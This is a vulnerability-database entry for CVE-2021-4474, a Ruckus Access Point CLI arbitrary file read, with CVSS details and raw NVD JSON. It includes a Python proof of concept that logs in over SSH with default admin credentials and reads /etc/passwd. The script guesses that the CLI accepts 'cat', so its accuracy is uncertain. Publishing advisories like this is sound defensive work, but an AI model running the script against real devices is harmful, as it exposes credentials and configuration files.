Security Vulnerability Report
中文
CVE-2021-4474 CVSS 4.9 MEDIUM

CVE-2021-4474

Published: 2026-03-26 20:16:08
Last Modified: 2026-03-30 13:26:51
Source: [email protected]

Description

Ruckus Access Point products contain an arbitrary file read vulnerability in the command-line interface that allows authenticated remote attackers with administrative privileges to read arbitrary files from the underlying filesystem. Attackers can exploit this vulnerability to access sensitive information including configuration files, credentials, and system data stored on the device.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Ruckus Access Point系列(具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2021-4474: Ruckus AP CLI Arbitrary File Read # This script demonstrates reading a sensitive file via the CLI. # Note: Exploitation requires Administrative Privileges (PR:H). import paramiko import sys def exploit(target_ip, username, password, file_path): try: print(f"[*] Connecting to {target_ip}...") # Establish SSH connection to the Ruckus AP CLI client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(target_ip, username=username, password=password, timeout=10) print(f"[*] Attempting to read {file_path}...") # Execute command to read arbitrary file # The specific command may vary depending on the specific CLI shell implementation. # Typically, if it's a Linux-based shell, 'cat' is used. stdin, stdout, stderr = client.exec_command(f"cat {file_path}") output = stdout.read().decode().strip() err = stderr.read().decode().strip() if output: print("[+] Success! File content:") print("-" * 20) print(output) print("-" * 20) else: print(f"[-] Failed to read file. Error: {err}") client.close() except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Example usage # Replace with actual target IP and credentials TARGET = "192.168.1.1" USER = "admin" PASS = "admin" FILE = "/etc/passwd" exploit(TARGET, USER, PASS, FILE)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-4474", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:07.730", "lastModified": "2026-03-30T13:26:50.827", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ruckus Access Point products contain an arbitrary file read vulnerability in the command-line interface that allows authenticated remote attackers with administrative privileges to read arbitrary files from the underlying filesystem. Attackers can exploit this vulnerability to access sensitive information including configuration files, credentials, and system data stored on the device."}, {"lang": "es", "value": "Los productos Ruckus Access Point contienen una vulnerabilidad de lectura arbitraria de archivos en la interfaz de línea de comandos que permite a atacantes remotos autenticados con privilegios administrativos leer archivos arbitrarios del sistema de archivos subyacente. Los atacantes pueden explotar esta vulnerabilidad para acceder a información sensible, incluyendo archivos de configuración, credenciales y datos del sistema almacenados en el dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://support.ruckuswireless.com/security_bulletins/306", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ruckus-ap-cli-arbitrary-file-read-allows-authenticated-remote-file-access", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.